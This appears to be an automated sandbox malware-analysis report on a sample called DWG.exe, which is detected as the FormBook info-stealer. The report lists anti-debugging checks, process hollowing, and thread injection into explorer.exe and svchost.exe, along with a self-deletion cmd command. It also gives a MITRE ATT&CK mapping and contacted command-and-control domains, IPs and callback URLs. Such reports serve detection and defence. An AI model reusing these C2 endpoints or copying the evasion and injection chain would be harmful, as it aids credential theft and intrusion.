          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A309 mov eax, dword ptr fs:[00000030h]10_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037503E2 mov eax, dword ptr fs:[00000030h]10_2_037503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374DBE9 mov eax, dword ptr fs:[00000030h]10_2_0374DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E3 mov ecx, dword ptr fs:[00000030h]10_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E3 mov ecx, dword ptr fs:[00000030h]10_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E3 mov eax, dword ptr fs:[00000030h]10_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A53CA mov eax, dword ptr fs:[00000030h]10_2_037A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037A53CA mov eax, dword ptr fs:[00000030h]10_2_037A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]10_2_03754BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]10_2_03754BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03754BAD mov eax, dword ptr fs:[00000030h]10_2_03754BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F5BA5 mov eax, dword ptr fs:[00000030h]10_2_037F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03752397 mov eax, dword ptr fs:[00000030h]10_2_03752397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375B390 mov eax, dword ptr fs:[00000030h]10_2_0375B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E138A mov eax, dword ptr fs:[00000030h]10_2_037E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03731B8F mov eax, dword ptr fs:[00000030h]10_2_03731B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03731B8F mov eax, dword ptr fs:[00000030h]10_2_03731B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DD380 mov ecx, dword ptr fs:[00000030h]10_2_037DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B mov eax, dword ptr fs:[00000030h]10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376927A mov eax, dword ptr fs:[00000030h]10_2_0376927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DB260 mov eax, dword ptr fs:[00000030h]10_2_037DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DB260 mov eax, dword ptr fs:[00000030h]10_2_037DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F8A62 mov eax, dword ptr fs:[00000030h]10_2_037F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037EEA55 mov eax, dword ptr fs:[00000030h]10_2_037EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037B4257 mov eax, dword ptr fs:[00000030h]10_2_037B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]10_2_03729240
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03729240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B236 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03764A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03764A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03725210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03725210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03743A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03738A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03752AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037E4AEF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03752ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0373AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0373AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0374B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0375513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03744120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03744120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_03729100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037B41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_0372B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 10_2_037499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DWG.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\DWG.exe | Code function: 5_2_00409B40 LdrLoadDll
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0043BAD2 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0043BAE4 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.hcbg.online
Source: C:\Windows\explorer.exe | Domain query: www.knowsyourdream.com
Source: C:\Windows\explorer.exe | Network Connect: 198.187.31.159 80
Source: C:\Windows\explorer.exe | Network Connect: 154.216.113.38 80
Source: C:\Windows\explorer.exe | Domain query: www.jntycy.com
Source: C:\Windows\explorer.exe | Domain query: www.publiccoins.online
Source: C:\Windows\explorer.exe | Domain query: www.theravewizards.com
Source: C:\Windows\explorer.exe | Domain query: www.thebrandstudiointernational.com
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.215 80
Source: C:\Windows\explorer.exe | Network Connect: 5.157.87.204 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\DWG.exe | Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 280000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\DWG.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DWG.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DWG.exe | Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\DWG.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\DWG.exe | Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 3352
Source: C:\Users\user\Desktop\DWG.exe | Process created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'
Source: explorer.exe, 00000006.00000000.331932782.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.362308444.0000000005E10000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.365065099.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0043601C GetLocalTime,GetSystemTime,GetTimeZoneInformation
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0043601C GetLocalTime,GetSystemTime,GetTimeZoneInformation
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_0044D2B5 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\DWG.exe | Code function: 0_2_00411BFD VirtualProtect,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexParameteri,glTexImage2D,glBindTexture,glBegin,glArrayElement,LineDDA

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 512 | Virtualization/Sandbox Evasion 2 | Input Capture 1 | System Time Discovery 2 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 512 | LSASS Memory | Security Software Discovery 121 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 14 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

Behavior Graph ID: 510733, Sample: DWG.exe, Start date: 28/10/2021, Architecture: WINDOWS, Score: 100

Graph nodes and edges (text summary of the rendered graph):
• Sample-level nodes: www.mylyk.net, mylyk.net; signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules), Found malware configuration, Malicious sample detected (through community Yara rule), 7 other signatures
• DWG.exe (started from the sample); signature: Tries to detect virtualization through RDTSC time measurements
• DWG.exe (second instance, started by the first); signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process (thread injection)
• explorer.exe (injected by the second DWG.exe instance); signature: System process connects to network (likely due to code injection or exploit); contacts www.jntycy.com 154.216.113.38, 49814, 80 (POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles), publiccoins.online 198.187.31.159, 49816, 80 (NAMECHEAP-NETUS, United States) and 7 other IPs or domains
• svchost.exe (started by explorer.exe); signatures: Self deletion via cmd delete, Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements
• cmd.exe (started by svchost.exe)
• conhost.exe (started by cmd.exe)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
DWG.exe | 50% | Virustotal |
DWG.exe | 38% | ReversingLabs | Win32.Trojan.Zusy
DWG.exe | 100% | Avira | HEUR/AGEN.1136968
DWG.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
5.1.DWG.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.DWG.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1136968
5.2.DWG.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
10.2.svchost.exe.900000.1.unpack | 100% | Avira | TR/Patched.Gen
0.1.DWG.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.0.DWG.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.DWG.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
10.2.svchost.exe.3c3796c.4.unpack | 100% | Avira | TR/Patched.Gen

          Domains

Source | Detection | Scanner | Label
mylyk.net | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://www.theravewizards.com/xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt | 0% | Avira URL Cloud | safe
http://www.jntycy.com/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE | 0% | Avira URL Cloud | safe
www.elsist.online/xzes/ | 0% | Avira URL Cloud | safe
http://schemas.mi | 0% | URL Reputation | safe
http://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB | 0% | Avira URL Cloud | safe
http://www.thebrandstudiointernational.com/xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mylyk.net | 198.54.116.195 | true | true | | unknown
parkingpage.namecheap.com | 198.54.117.215 | true | false | | high
thebrandstudiointernational.com | 5.157.87.204 | true | true | | unknown
publiccoins.online | 198.187.31.159 | true | true | | unknown
www.jntycy.com | 154.216.113.38 | true | true | | unknown
www.theravewizards.com | unknown | unknown | true | | unknown
www.hcbg.online | unknown | unknown | true | | unknown
www.knowsyourdream.com | unknown | unknown | true | | unknown
www.thebrandstudiointernational.com | unknown | unknown | true | | unknown
www.mylyk.net | unknown | unknown | true | | unknown
